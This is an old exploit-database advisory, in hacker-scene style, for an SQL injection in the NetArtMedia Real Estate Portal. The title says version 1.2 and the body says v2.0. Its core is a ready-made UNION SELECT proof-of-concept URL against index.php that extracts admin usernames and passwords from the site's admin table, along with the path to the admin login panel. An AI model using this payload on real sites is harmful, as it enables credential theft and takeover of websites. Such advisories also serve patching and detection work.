Netartmedia Real Estate Portal 1.2 - SQL Injection

EDB-ID:

6518


Platform:

PHP

Published:

2008-09-21

######## ##    ##  ######  ########  ##    ## ########  ########  #######  ########
##       ###   ## ##    ## ##     ##  ##  ##  ##     ##    ##    ##     ## ##     ##
##       ####  ## ##       ##     ##   ####   ##     ##    ##           ## ##     ##
######   ## ## ## ##       ########     ##    ########     ##     #######  ##     ##
##       ##  #### ##       ##   ##      ##    ##           ##           ## ##     ##
##       ##   ### ##    ## ##    ##     ##    ##           ##    ##     ## ##     ##
######## ##    ##  ######  ##     ##    ##    ##           ##     #######  ########
################################ !R4Q!4N H4CK3R  ###################################
NetArtMedia Real Estate Portal v2.0  Sql Injection Vulnerability
Website    : http://www.netartmedia.net
Founded By : Encrypt3d.M!nd
Home Page  : http://encrypt3d.blogspot.com

# Remote Sql Injection(s) :
Affected File :
index.php

PoC:
/index.php?mod=re_search&ad=-666 union select 1,2,password,username,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from websiteadmin_admin_users

Administration Panel:
/ADMIN/login.php

# Greetz:
MY Sweet,L!0N,EL Mariachi,-=MizO=-,Shadow Administrator,
KoRn The Dog,MiNi-SpIder,All My Friends

The EnD :D

# milw0rm.com [2008-09-21]